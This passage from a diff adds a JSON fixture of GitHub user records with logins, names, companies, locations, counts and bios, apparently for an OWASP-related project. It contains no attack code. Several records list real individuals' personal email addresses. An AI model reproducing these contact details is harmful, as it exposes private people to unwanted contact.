"collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-02-05T14:06:00Z", + "updated_at": "2024-07-01T13:09:00Z", + "node_id": "MDQ6VXNlcjQ3MzU3MjM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2722, + "fields": { + "nest_created_at": "2024-09-12T02:08:25.945Z", + "nest_updated_at": "2024-09-12T02:08:25.945Z", + "name": "Jerry Chen", + "login": "jerry153fish", + "email": "jerry153fish@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1586798?v=4", + "company": "@origin-energy", + "location": "Melbourne", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 19, + "public_gists_count": 0, + "public_repositories_count": 77, + "created_at": "2012-03-29T11:33:27Z", + "updated_at": "2024-09-02T01:04:26Z", + "node_id": "MDQ6VXNlcjE1ODY3OTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2723, + "fields": { + "nest_created_at": "2024-09-12T02:08:27.224Z", + "nest_updated_at": "2024-09-12T02:08:27.224Z", + "name": "Edgars Kokorevičs", + "login": "edgecorelv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15019968?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-10-07T18:31:03Z", + "updated_at": "2024-08-07T16:49:23Z", + "node_id": "MDQ6VXNlcjE1MDE5OTY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2724, + "fields": { + "nest_created_at": "2024-09-12T02:08:33.339Z", + "nest_updated_at": "2024-09-12T02:08:33.339Z", + "name": "Bob Clingan", + "login": "bclingan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38579?v=4", + "company": "", + "location": "Bel Air, MD", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 4, + "created_at": "2008-12-05T19:31:25Z", + "updated_at": "2024-05-31T19:21:57Z", + "node_id": "MDQ6VXNlcjM4NTc5", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2725, + "fields": { + "nest_created_at": "2024-09-12T02:08:34.960Z", + "nest_updated_at": "2024-09-12T02:08:34.960Z", + "name": "", + "login": "richard-diederen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15132384?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-10-14T22:22:53Z", + "updated_at": "2023-01-20T21:18:29Z", + "node_id": "MDQ6VXNlcjE1MTMyMzg0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2726, + "fields": { + "nest_created_at": "2024-09-12T02:08:36.600Z", + "nest_updated_at": "2024-09-22T19:40:11.180Z", + "name": "Sébastien Delcoigne", + "login": "sebD", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/934062?v=4", + "company": "", + "location": "Melbourne, Victoria, Australia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2011-07-23T11:28:45Z", + "updated_at": "2024-06-04T03:16:05Z", + "node_id": "MDQ6VXNlcjkzNDA2Mg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2727, + "fields": { + "nest_created_at": "2024-09-12T02:08:38.228Z", + "nest_updated_at": "2024-09-12T02:08:38.228Z", + "name": "Matthias Vogel", + "login": "Kanti", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/471387?v=4", + "company": "@andersundsehr", + "location": "Stuttgart - Germany", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 23, + "public_gists_count": 16, + "public_repositories_count": 71, + "created_at": "2010-11-07T18:36:09Z", + "updated_at": "2024-08-20T16:48:37Z", + "node_id": "MDQ6VXNlcjQ3MTM4Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2728, + "fields": { + "nest_created_at": "2024-09-12T02:08:40.380Z", + "nest_updated_at": "2024-09-12T02:08:40.380Z", + "name": "", + "login": "JasonTheProgrammer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17895269?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 1, + "created_at": "2016-03-17T04:32:38Z", + "updated_at": "2024-09-10T20:32:17Z", + "node_id": "MDQ6VXNlcjE3ODk1MjY5", + "bio": "My name is Jason, I am a programmer.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2729, + "fields": { + "nest_created_at": "2024-09-12T02:08:49.917Z", + "nest_updated_at": "2024-09-22T19:40:41.849Z", + "name": "Terror", + "login": "mterron", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4434907?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2013-05-15T06:42:38Z", + "updated_at": "2024-09-03T11:26:35Z", + "node_id": "MDQ6VXNlcjQ0MzQ5MDc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2730, + "fields": { + "nest_created_at": "2024-09-12T02:08:51.997Z", + "nest_updated_at": "2024-09-12T02:08:51.997Z", + "name": "Christian", + "login": "criskeks", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/167431463?v=4", + "company": "Soest, Germany", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-04-18T11:47:09Z", + "updated_at": "2024-04-18T12:26:47Z", + "node_id": "U_kgDOCfrNJw", + "bio": "\"sure\"", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2731, + "fields": { + "nest_created_at": "2024-09-12T02:08:54.143Z", + "nest_updated_at": "2024-09-12T02:08:55.371Z", + "name": "iLdar", + "login": "tyreckiu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/71664399?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-09-21T18:03:17Z", + "updated_at": "2024-08-30T10:02:42Z", + "node_id": "MDQ6VXNlcjcxNjY0Mzk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2732, + "fields": { + "nest_created_at": "2024-09-12T02:09:00.692Z", + "nest_updated_at": "2024-09-12T02:09:00.692Z", + "name": "Toe Khaing Oo", + "login": "toekhaing", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6739256?v=4", + "company": "", + "location": "Bangkok, Thailand", + "collaborators_count": 0, + "following_count": 47, + "followers_count": 21, + "public_gists_count": 1, + "public_repositories_count": 32, + "created_at": "2014-02-20T16:03:59Z", + "updated_at": "2024-08-14T09:06:55Z", + "node_id": "MDQ6VXNlcjY3MzkyNTY=", + "bio": "Security Enthusiast", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2733, + "fields": { + "nest_created_at": "2024-09-12T02:09:29.058Z", + "nest_updated_at": "2024-09-12T02:09:29.058Z", + "name": "", + "login": "tylerforajter", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100237457?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-02-22T20:17:22Z", + "updated_at": "2024-06-13T14:45:28Z", + "node_id": "U_kgDOBfmAkQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2734, + "fields": { + "nest_created_at": "2024-09-12T02:09:45.068Z", + "nest_updated_at": "2024-09-12T02:09:45.068Z", + "name": "", + "login": "andrejpohlmann", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17292191?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2016-02-17T10:45:32Z", + "updated_at": "2024-07-02T12:03:14Z", + "node_id": "MDQ6VXNlcjE3MjkyMTkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2735, + "fields": { + "nest_created_at": "2024-09-12T02:09:46.291Z", + "nest_updated_at": "2024-09-12T02:09:46.291Z", + "name": "", + "login": "numa1985", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/139448875?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2023-07-13T08:57:55Z", + "updated_at": "2024-01-31T10:44:22Z", + "node_id": "U_kgDOCE_SKw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2736, + "fields": { + "nest_created_at": "2024-09-12T02:09:55.197Z", + "nest_updated_at": "2024-09-12T02:09:55.197Z", + "name": "Christian Mathis", + "login": "chrismathis", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5596296?v=4", + "company": "", + "location": "Vorarlberg, Austria", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2013-10-02T16:31:18Z", + "updated_at": "2024-08-21T11:51:19Z", + "node_id": "MDQ6VXNlcjU1OTYyOTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2737, + "fields": { + "nest_created_at": "2024-09-12T02:10:25.331Z", + "nest_updated_at": "2024-09-12T02:10:25.332Z", + "name": "Pat Heard", + "login": "patheard", + "email": "patrick.heard@cds-snc.ca", + "avatar_url": "https://avatars.githubusercontent.com/u/2110107?v=4", + "company": "@cds-snc ", + "location": "Ottawa, ON", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 28, + "public_gists_count": 4, + "public_repositories_count": 52, + "created_at": "2012-08-07T13:26:59Z", + "updated_at": "2024-08-25T22:47:43Z", + "node_id": "MDQ6VXNlcjIxMTAxMDc=", + "bio": "Site Reliability Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2738, + "fields": { + "nest_created_at": "2024-09-12T02:10:27.809Z", + "nest_updated_at": "2024-09-12T02:10:27.809Z", + "name": "Shafeequr Rehman Mohammed", + "login": "mos9mu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117162895?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-11-01T09:55:30Z", + "updated_at": "2024-03-28T11:36:55Z", + "node_id": "U_kgDOBvvDjw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2739, + "fields": { + "nest_created_at": "2024-09-12T02:10:28.642Z", + "nest_updated_at": "2024-09-22T19:41:20.896Z", + "name": "", + "login": "freshpr", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65549906?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-05-18T13:55:00Z", + "updated_at": "2024-05-16T07:30:34Z", + "node_id": "MDQ6VXNlcjY1NTQ5OTA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2740, + "fields": { + "nest_created_at": "2024-09-12T02:10:38.605Z", + "nest_updated_at": "2024-09-12T02:10:38.605Z", + "name": "Jiří Altman", + "login": "JuryA", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11990780?v=4", + "company": "", + "location": "Brno, Czech Republic", + "collaborators_count": 0, + "following_count": 132, + "followers_count": 30, + "public_gists_count": 37, + "public_repositories_count": 364, + "created_at": "2015-04-17T08:01:14Z", + "updated_at": "2024-08-07T07:11:22Z", + "node_id": "MDQ6VXNlcjExOTkwNzgw", + "bio": "\"Konstrukční dokonalosti není dosaženo tehdy, když už není co přidat, ale tehdy, když už nemůžete nic odebrat.\" -- Eric S. Raymond (Katedrála a tržiště)", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2741, + "fields": { + "nest_created_at": "2024-09-12T02:10:39.451Z", + "nest_updated_at": "2024-09-20T18:27:32.197Z", + "name": "Martin Dobrev", + "login": "mclueppers", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/370615?v=4", + "company": "@dobrevit ", + "location": "London, UK", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 8, + "public_repositories_count": 34, + "created_at": "2010-08-20T08:58:17Z", + "updated_at": "2024-08-16T10:15:09Z", + "node_id": "MDQ6VXNlcjM3MDYxNQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2742, + "fields": { + "nest_created_at": "2024-09-12T02:10:42.038Z", + "nest_updated_at": "2024-09-12T02:10:42.038Z", + "name": "Dani Hengeveld", + "login": "danihengeveld", + "email": "dani10hengeveld@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25222020?v=4", + "company": "@InfoSupportNederland", + "location": "Anholt, Nordrhein-Westfalen, Germany", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2017-01-19T10:31:14Z", + "updated_at": "2024-09-11T13:35:44Z", + "node_id": "MDQ6VXNlcjI1MjIyMDIw", + "bio": "IT Consultant at Info Support", + "is_hireable": false, + "twitter_username": "HengeveldDani" + } +}, +{ + "model": "github.user", + "pk": 2743, + "fields": { + "nest_created_at": "2024-09-12T02:10:44.198Z", + "nest_updated_at": "2024-09-13T05:08:45.229Z", + "name": "", + "login": "dggarciabase", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/175609458?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-07-15T10:57:20Z", + "updated_at": "2024-07-15T10:59:47Z", + "node_id": "U_kgDOCneWcg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2744, + "fields": { + "nest_created_at": "2024-09-12T02:11:37.885Z", + "nest_updated_at": "2024-09-22T19:42:24.957Z", + "name": "meha", + "login": "mehab", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26340948?v=4", + "company": "Citi", + "location": "London", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-03-11T06:52:41Z", + "updated_at": "2024-08-27T11:45:06Z", + "node_id": "MDQ6VXNlcjI2MzQwOTQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2745, + "fields": { + "nest_created_at": "2024-09-12T02:12:20.401Z", + "nest_updated_at": "2024-09-22T19:41:51.002Z", + "name": "", + "login": "VithikaS", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122881935?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-01-17T11:59:02Z", + "updated_at": "2024-09-11T12:59:13Z", + "node_id": "U_kgDOB1MHjw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2746, + "fields": { + "nest_created_at": "2024-09-12T02:13:33.763Z", + "nest_updated_at": "2024-09-12T02:13:33.763Z", + "name": "Michal Frystacky", + "login": "MFry", + "email": "codefry+git@pm.me", + "avatar_url": "https://avatars.githubusercontent.com/u/579618?v=4", + "company": "", + "location": "Orlando, FL", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 9, + "public_gists_count": 8, + "public_repositories_count": 47, + "created_at": "2011-01-23T20:01:47Z", + "updated_at": "2024-08-14T16:08:22Z", + "node_id": "MDQ6VXNlcjU3OTYxOA==", + "bio": "Software Architect and Full Stack Developer.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2747, + "fields": { + "nest_created_at": "2024-09-12T02:14:10.419Z", + "nest_updated_at": "2024-09-22T19:36:05.831Z", + "name": "Mykhailo Sindieiev", + "login": "mikesindieiev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9822870?v=4", + "company": "", + "location": "Barcelona, Spain", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2014-11-18T13:40:45Z", + "updated_at": "2024-09-02T14:29:48Z", + "node_id": "MDQ6VXNlcjk4MjI4NzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2748, + "fields": { + "nest_created_at": "2024-09-12T02:14:23.990Z", + "nest_updated_at": "2024-09-12T02:14:23.990Z", + "name": "Strakeln", + "login": "Strakeln", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/101366557?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-03-10T21:48:11Z", + "updated_at": "2024-01-29T18:51:55Z", + "node_id": "U_kgDOBgq7HQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2749, + "fields": { + "nest_created_at": "2024-09-12T02:14:31.068Z", + "nest_updated_at": "2024-09-22T19:41:44.861Z", + "name": "Worming", + "login": "worming004", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23192591?v=4", + "company": "CraftLab IT", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 125, + "followers_count": 22, + "public_gists_count": 2, + "public_repositories_count": 121, + "created_at": "2016-11-01T14:04:12Z", + "updated_at": "2024-09-22T10:39:58Z", + "node_id": "MDQ6VXNlcjIzMTkyNTkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2750, + "fields": { + "nest_created_at": "2024-09-12T02:15:19.141Z", + "nest_updated_at": "2024-09-12T02:15:19.141Z", + "name": "", + "login": "duzztie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/53379096?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-07-27T17:59:20Z", + "updated_at": "2024-06-09T15:24:12Z", + "node_id": "MDQ6VXNlcjUzMzc5MDk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2751, + "fields": { + "nest_created_at": "2024-09-12T02:15:21.662Z", + "nest_updated_at": "2024-09-22T18:47:14.782Z", + "name": "Calle Kabo", + "login": "kabo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/357601?v=4", + "company": "KaboHub", + "location": "New Zealand", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 3, + "public_repositories_count": 33, + "created_at": "2010-08-08T10:11:33Z", + "updated_at": "2024-09-12T02:01:00Z", + "node_id": "MDQ6VXNlcjM1NzYwMQ==", + "bio": "I'm primarily on https://gitlab.com/users/kabo/projects", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2752, + "fields": { + "nest_created_at": "2024-09-12T02:15:22.516Z", + "nest_updated_at": "2024-09-12T02:15:22.516Z", + "name": "Michal Pazucha", + "login": "michalmc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59824956?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-01-13T10:04:33Z", + "updated_at": "2024-04-11T13:46:27Z", + "node_id": "MDQ6VXNlcjU5ODI0OTU2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2753, + "fields": { + "nest_created_at": "2024-09-12T02:15:28.648Z", + "nest_updated_at": "2024-09-22T19:44:50.335Z", + "name": "OWASP BLT", + "login": "OWASP-BLT", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/160347863?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2024-02-17T18:23:06Z", + "updated_at": "2024-09-01T11:32:49Z", + "node_id": "O_kgDOCY621w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2754, + "fields": { + "nest_created_at": "2024-09-12T02:15:32.431Z", + "nest_updated_at": "2024-09-22T19:44:48.667Z", + "name": "Fred Falcon", + "login": "fredfalcon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7475382?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-05-03T17:11:35Z", + "updated_at": "2024-09-21T23:50:07Z", + "node_id": "MDQ6VXNlcjc0NzUzODI=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2755, + "fields": { + "nest_created_at": "2024-09-12T02:15:33.279Z", + "nest_updated_at": "2024-09-22T19:45:00.131Z", + "name": "", + "login": "bug-reporter-bot", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24620264?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-12-17T09:55:18Z", + "updated_at": "2023-04-03T19:25:20Z", + "node_id": "MDQ6VXNlcjI0NjIwMjY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2756, + "fields": { + "nest_created_at": "2024-09-12T02:15:41.326Z", + "nest_updated_at": "2024-09-22T19:44:16.748Z", + "name": "H4N1L", + "login": "HanilJain", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/119354421?v=4", + "company": "Bits Pilani Pilani campus", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2022-11-28T18:58:15Z", + "updated_at": "2024-09-21T12:58:37Z", + "node_id": "U_kgDOBx00NQ", + "bio": "Python | Go | Docker | REST API | DJango | HTML/CSS | JS | WebD | Figma | WebPentesting", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2757, + "fields": { + "nest_created_at": "2024-09-12T02:15:42.954Z", + "nest_updated_at": "2024-09-22T19:44:30.395Z", + "name": "Geerivana", + "login": "gauravloj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6872672?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2014-03-06T12:21:12Z", + "updated_at": "2024-08-06T20:50:14Z", + "node_id": "MDQ6VXNlcjY4NzI2NzI=", + "bio": "Full stack developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2758, + "fields": { + "nest_created_at": "2024-09-12T02:16:28.786Z", + "nest_updated_at": "2024-09-22T19:44:58.509Z", + "name": "Bishal Das", + "login": "CodeWithBishal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/69814108?v=4", + "company": "", + "location": "Indore, India", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2020-08-17T17:31:46Z", + "updated_at": "2024-09-05T19:46:31Z", + "node_id": "MDQ6VXNlcjY5ODE0MTA4", + "bio": "GSoC'24 @ OWASP || \r\nCoding ⌨️\r\nSpace 🚀\r\nChess ♖", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2759, + "fields": { + "nest_created_at": "2024-09-12T02:16:31.136Z", + "nest_updated_at": "2024-09-22T19:44:14.769Z", + "name": "Sarthak5598", + "login": "Sarthak5598", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108613416?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2022-07-03T10:57:18Z", + "updated_at": "2024-08-01T14:11:15Z", + "node_id": "U_kgDOBnlPKA", + "bio": "Hey guys, I am B-tech CE student \r\n\r\nI am a Open Source Contributor\r\n\r\nOpen for work!", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2760, + "fields": { + "nest_created_at": "2024-09-12T02:16:32.891Z", + "nest_updated_at": "2024-09-22T19:44:56.888Z", + "name": "Altafur Rahman", + "login": "JisanAR03", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/97744811?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2022-01-14T14:28:53Z", + "updated_at": "2024-09-04T22:33:34Z", + "node_id": "U_kgDOBdN3qw", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2761, + "fields": { + "nest_created_at": "2024-09-12T02:16:34.608Z", + "nest_updated_at": "2024-09-22T19:44:55.920Z", + "name": "", + "login": "Uttkarsh-raj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/106571927?v=4", + "company": "", + "location": "Bangalore, India", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 43, + "created_at": "2022-05-31T03:35:14Z", + "updated_at": "2024-09-13T21:08:02Z", + "node_id": "U_kgDOBloolw", + "bio": "GSoC'24 @OWASP | Flutter| Golang", + "is_hireable": false, + "twitter_username": "__uttkarsh__" + } +}, +{ + "model": "github.user", + "pk": 2762, + "fields": { + "nest_created_at": "2024-09-12T02:16:36.787Z", + "nest_updated_at": "2024-09-12T02:18:43.215Z", + "name": "", + "login": "CodewithbishalBLT", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/172189947?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2024-06-09T13:02:23Z", + "updated_at": "2024-09-05T19:46:43Z", + "node_id": "U_kgDOCkNo-w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2763, + "fields": { + "nest_created_at": "2024-09-12T02:18:27.793Z", + "nest_updated_at": "2024-09-12T02:18:27.793Z", + "name": "Dev Gajjar", + "login": "DevGajjar28", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/145287513?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 52, + "created_at": "2023-09-17T18:03:10Z", + "updated_at": "2024-08-21T09:36:44Z", + "node_id": "U_kgDOCKjpWQ", + "bio": "Hello I am Dev ,\"Enthusiastic developer 💻 , dedicated to crafting elegant solutions and pushing the boundaries of technology.\"", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2764, + "fields": { + "nest_created_at": "2024-09-12T02:18:29.915Z", + "nest_updated_at": "2024-09-22T19:44:37.049Z", + "name": "Nikhil Raj", + "login": "nikhil25803", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93156825?v=4", + "company": "ClueLess", + "location": "Kolkata", + "collaborators_count": 0, + "following_count": 40, + "followers_count": 120, + "public_gists_count": 0, + "public_repositories_count": 60, + "created_at": "2021-10-25T18:58:02Z", + "updated_at": "2024-08-27T12:44:23Z", + "node_id": "U_kgDOBY112Q", + "bio": "Backend and Cloud Engineer ☁️ | Prev. SDE Intern at Dashmed and Backend Developer Intern at Edilitics and TaskLabs 💼| 1x National Level Hackathon 🏆", + "is_hireable": false, + "twitter_username": "humans_write" + } +}, +{ + "model": "github.user", + "pk": 2765, + "fields": { + "nest_created_at": "2024-09-12T02:20:20.401Z", + "nest_updated_at": "2024-09-22T19:44:24.375Z", + "name": "Jayraj Dulange", + "login": "Deus1704", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117574289?v=4", + "company": "", + "location": "IIT Gandhinagar, Gujarat", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 21, + "public_gists_count": 2, + "public_repositories_count": 33, + "created_at": "2022-11-06T11:44:28Z", + "updated_at": "2024-09-16T13:00:37Z", + "node_id": "U_kgDOBwIKkQ", + "bio": "GSoC'24 @Sunpy | UG at IIT Gandhinagar.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2766, + "fields": { + "nest_created_at": "2024-09-12T02:20:21.668Z", + "nest_updated_at": "2024-09-22T17:39:56.926Z", + "name": "Santhosh Mani ", + "login": "Santhoshmani1", + "email": "pitakasanthosh@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/119673958?v=4", + 